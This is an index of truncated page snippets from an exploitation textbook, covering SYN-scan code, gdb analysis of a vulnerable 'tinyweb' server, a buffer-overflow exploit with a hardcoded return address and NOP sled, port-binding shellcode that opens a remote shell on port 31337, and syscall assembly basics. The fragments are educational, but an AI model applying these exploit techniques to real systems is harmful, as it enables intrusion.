Hacking - The Art of Exploitation, 2nd Edition
Networking 267 0x475 Proactive Defense (shroud). Port scans are often ...
268 0x400 PORT STATE SERVICE 22/tcp open|filtered ssh 80/tcp open|filtered http MAC Address: 00:01:6C:EB:1D:50 (Foxconn) Nmap fi ...
Networking 269 char errbuf[PCAP_ERRBUF_SIZE]; // Same size as LIBNET_ERRBUF_SIZE char *device; u_long target_ip; int network, i; ...
270 0x400 strcat(filter_string, "tcp[tcpflags] & tcp-syn != 0 and tcp[tcpflags] & tcp-ack = 0"); if(ports[0] != 0) { // ...
Networking 271 NULL, // Payload (none) 0, // Payload length (passed->packet) + LIBNET_IP_H);// Packet header memory if (libne ...
272 0x400 23/tcp open telnet 24/tcp open priv-mail 25/tcp open smtp [ output trimmed ] 32780/tcp open sometimes-rpc23 32786/tcp ...
Networking 273 while(recv(sockfd, ptr, 1, 0) == 1) { // Read a single byte. if(*ptr == EOL[eol_matched]) { // Does this byte mat ...
274 0x400 (gdb) bt #0 0xb7fe77f2 in ?? () #1 0xb7f691e1 in ?? () #2 0x08048ccf in main () at tinyweb.c:44 (gdb) list 44 39 if (list ...
Networking 275 $1 = 540 (gdb) p /x 0xbffff5c0 + 200 $2 = 0xbffff688 (gdb) quit The program is running. Quit anyway (and detach i ...
276 0x400 #define RETADDR 0xbffff688 int main(int argc, char *argv[]) { int sockfd, buflen; struct hostent host_info; struct socka ...
Networking 277 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 9 ...
278 0x400 The vulnerability certainly exists, but the shellcode doesn’t do what we want in this case. Since we’re not at the con ...
Networking 279 When this exploit is compiled and run against a host running tinyweb server, the shellcode listens on port 31337 ...
280 0x400 Even though the remote shell doesn’t display a prompt, it still accepts commands and returns the output over the netwo ...
0x500 SHELLCODE So far, the shellcode used in our exploits has been just a string of copied and pasted bytes. We have seen stand ...
282 0x500 0x510 Assembly vs. C The shellcode bytes are actually architecture-specific machine instructions, so shellcode is writ ...
Shellcode 283 mmap2(0xb7ee4000, 9596, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ee4000 close(3) = ...
284 0x500 From /usr/include/unistd.h /* Standard file descriptors. */ #define STDIN_FILENO 0 /* Standard input. */ #define STDOU ...
Shellcode 285 #define __NR_stime 25 #define __NR_ptrace 26 #define __NR_alarm 27 #define __NR_oldfstat 28 #define __NR_pause 29 defin ...
286 0x500 ; SYSCALL: write(1, msg, 14) mov eax, 4 ; Put 4 into eax, since write is syscall #4. mov ebx, 1 ; Put 1 into ebx, sinc ...